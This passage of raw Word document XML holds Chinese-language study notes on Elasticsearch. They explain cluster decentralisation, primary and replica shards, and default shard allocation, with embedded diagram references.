          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理。</w:t>
      </w:r>
      <w:r w:rsidR="0075798E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0075798E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="0075798E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的一个概念就是去中心化，字面上理解就是无中心节点，这是对于集群外部来说的，因为从外部来看</w:t>
      </w:r>
      <w:r w:rsidR="0075798E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="0075798E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>集群，在逻辑上是个整体，你与任何一个节点的通信和与整个</w:t>
      </w:r>
      <w:r w:rsidR="0075798E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="0075798E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>集群通信是等价的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB693E" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB693E" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>主要分片</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(primary shard)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复制分片</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(replica shard)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0EAC" w:rsidRPr="00F41A4C" w:rsidRDefault="001F0EAC" w:rsidP="001F0EAC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="172" w:afterAutospacing="0" w:line="275" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>索引只是一个用来指向一个或多个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>分片</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(shards)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>逻辑命名空间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(logical namespace)”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0EAC" w:rsidRPr="00F41A4C" w:rsidRDefault="001F0EAC" w:rsidP="001F0EAC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="172" w:afterAutospacing="0" w:line="275" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>分片</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(shard)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>是一个最小级别</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>工作单元</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(worker unit)”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>它只是保存了索引中所有数据的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0EAC" w:rsidRPr="00F41A4C" w:rsidRDefault="001F0EAC" w:rsidP="005B50E0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复制分片只是主分片的一个副本，它可以防止硬件故障导致的数据丢失，同时可以提供读请求，比如搜索或者从别的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>shard</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>取回文档</w:t>
      </w:r>
      <w:r w:rsidR="00C8008B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8008B" w:rsidRPr="00F41A4C" w:rsidRDefault="00C8008B" w:rsidP="005B50E0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>默认情况下，一个索引被分配</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个主分片，每个分片都有一个复制分片</w:t>
      </w:r>
      <w:r w:rsidR="007C5D05" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005771BD" w:rsidRPr="00F41A4C" w:rsidRDefault="005771BD" w:rsidP="005771BD">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4739438" cy="2606722"/>
            <wp:effectExtent l="19050" t="0" r="4012" b="0"/>
            <wp:docPr id="41" name="图片 1" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\G{6O4ZZSX[I%9W9M16FWGX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AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\G{6O4ZZSX[I%9W9M16FWGXJ.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId285" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4739709" cy="2606871"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005771BD" w:rsidRPr="00F41A4C" w:rsidRDefault="005771BD" w:rsidP="005B50E0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB693E" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB693E" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00875FEE" w:rsidRPr="00F41A4C" w:rsidRDefault="00875FEE" w:rsidP="00875FEE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4528668" cy="3370997"/>
            <wp:effectExtent l="19050" t="0" r="5232" b="0"/>
            <wp:docPr id="42" name="图片 3" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\MFFQH~%FI8VHN_K6C_H3~P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strator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\MFFQH~%FI8VHN_K6C_H3~PO.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId286" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4529815" cy="3371851"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4B2E" w:rsidRPr="00F41A4C" w:rsidRDefault="007235D9" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分片本身就是一个完整的搜索引擎，它可以使用单一节点的所有资源。我们拥有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个分片（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个主分片和三个复制分片），最多可以扩展到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个节点，每个节点上有一个分片，每个分片可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用这个节点的资源</w:t>
      </w:r>
      <w:r w:rsidR="00176BE1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007235D9" w:rsidRPr="00F41A4C" w:rsidRDefault="004A4AB0" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>主分片的数量在创建索引时已经确定，复制分片的数量可以在运行中的集群中动态地变更</w:t>
      </w:r>
      <w:r w:rsidR="004B7C4E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A464CE" w:rsidRPr="00F41A4C" w:rsidRDefault="00A464CE" w:rsidP="00A464CE">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5650799" cy="2797792"/>
            <wp:effectExtent l="19050" t="0" r="7051" b="0"/>
            <wp:docPr id="43" name="图片 5" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\7P}U462@GAA%CNSCW8DD5X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istrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\7P}U462@GAA%CNSCW8DD5XT.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId287" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5653269" cy="2799015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
